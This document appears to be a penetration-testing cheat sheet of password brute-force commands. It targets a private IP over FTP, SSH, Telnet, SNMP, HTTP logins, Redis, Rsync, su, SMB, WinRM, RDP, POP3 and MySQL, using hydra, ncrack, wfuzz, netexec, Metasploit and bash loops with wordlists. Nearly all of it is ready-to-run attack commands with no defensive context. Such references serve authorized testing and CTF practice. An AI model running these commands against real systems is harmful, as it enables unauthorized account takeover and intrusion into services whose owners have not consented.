Brute Force

FTP

# default port
hydra -t 64 -l admin -P rockyou.txt ftp://192.168.1.2                                                                      
ncrack -v -f --user admin -P rockyou.txt ftp://192.168.1.2
# other port
hydra -t 64 -l admin -P rockyou.txt ftp://192.168.1.2:1234
ncrack -v -f --user admin -P rockyou.txt ftp://192.168.1.2:1234
# colon separated "user:pass"
hydra -C ftp-betterdefaultpasslist.txt ftp://192.168.1.2

FTPS

hydra -t 64 -l ftpuser -P rockyou.txt ftps://192.168.1.2 -f -I

SSH

# default port
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2
ncrack --user admin -P rockyou.txt 192.168.1.2:22 -f
# other port
hydra -t 64 -l admin -P rockyou.txt ssh://192.168.1.2:1234
ncrack --user admin -P rockyou.txt 192.168.1.2:1234 -f
# metasploit
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.1.2
set USERNAME root
set PASS_FILE rockyou.txt
set VERBOSE true
run

Telnet

# WARNING: not use threads (-t)
hydra -l admin -P rockyou.txt telnet://192.168.1.2

SNMP (Community Strings)

onesixtyone 192.168.1.2 -c community-strings.dic
hydra -P community-strings.dic snmp://192.168.1.2                                           

HTTP

GET

Basic Auth

wfuzz -t 200 -c -w /opt/techyou.txt --basic "peter:FUZZ" -u "http://192.168.1.2/login/" --hh=179
hydra -t 64 -l peter -P /opt/techyou.txt http-get://192.168.1.2/login/

Digest

wfuzz -c -w /opt/techyou.txt --digest "peter:FUZZ" -u "http://192.168.1.2/login/" --hh=459
hydra -t 64 -l peter -P /opt/techyou.txt http-get://192.168.1.2/login/

POST

Hydra

# Password
hydra -t 64 -l peter -P /opt/techyou.txt 192.168.1.2 http-form-post "/admin/login.php:user=peter&password=^PASS^:Invalid Credentials"
hydra -t 64 -l peter -P /opt/techyou.txt 192.168.1.2 http-form-post "/admin/login.php:user=peter&password=^PASS^:F=Invalid Credentials"
# Only Password (NO Username)
hydra -t 64 -l none -P /opt/techyou.txt 192.168.1.2 http-post-form "/admin/login.php:password=^PASS^:Invalid Password"

Bash

while IFS= read -r pass; do echo -ne "\r[-] Testing Password : $pass"; tput el; curl -s "http://192.168.1.2/admin/login.php" -d "user=peter&password=$pass" | grep -q "Invalid Credentials" || { echo -e "\n[+] Found Password   : $pass"; break; }; done < /opt/techyou.txt

Wfuzz

• --hc/hl/hw/hh - Hide responses with the specified code/lines/words/chars
• --sc/sl/sw/sh - Show responses with the specified code/lines/words/chars
• --ss/hs (regex) - Show/Hide responses with the specified regex within the content

# Password - Hide Chars (--hh)
wfuzz -t 200 -c -w /opt/techyou.txt -d "user=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hh=19
# Password + Username - Hide Chars (--hh)
wfuzz -c -w users.dic -w pass.dic -d "user=FUZZ&password=FUZ2Z" -u "http://192.168.1.2/admin/login.php" --hh=19
# Password - Hide Content Response (--hs) [regex: Invalid Credentials]
wfuzz -t 200 -c -w /opt/techyou.txt -d "user=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hs "Invalid Credentials"
# Password - Numbers (PIN)
wfuzz -t 200 -c -z range,0000-9999 -d "username=peter&password=FUZZ" -u "http://192.168.1.2/admin/login.php" --hh=19

Redis

# defautl port
hydra -t 64 redis://192.168.1.2 -P rockyou.txt
nmap -p6379 --script="redis-brute" 192.168.1.2
# other port
hydra -t 64 redis://192.168.1.2:1234 -P rockyou.txt
nmap -p1234 --script="redis-brute" 192.168.1.2

Rsync

Modules

while IFS= read -r line; do echo ${line} | timeout 0.5 rsync 192.168.1.2::${line} &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/common.txt

Password

while IFS= read -r line; do echo ${line} | timeout 0.5 sshpass -p ${line} rsync rsync://peter@192.168.1.2/share/ &>/dev/null; if [ $? -eq 0 ]; then echo -e "\n[+] Found: ${line}\n"; break; fi; done < /opt/techyou.txt

su

while IFS= read -r line; do echo $line | timeout 2 su peter 2>/dev/null; if [ $? -eq 0 ]; then echo $line; break; fi; done < techyou.txt

SMB

netexec smb 192.168.1.2 -u peter -p rockyou.txt
netexec smb 192.168.1.2 -u peter -p rockyou.txt --local-auth

WinRM

netexec winrm 192.168.1.2 -u administrator -p rockyou.txt

RDP

hydra -t 64 -l admin -P rockyou.txt rdp://192.168.1.2

POP3

hydra -t 64 -l admin -P rockyou.txt pop3://192.168.1.2

MySQL

hydra -t 64 -l root -P rockyou.txt mysql://192.168.1.2
ncrack --user root -P rockyou.txt mysql://192.168.1.2:3306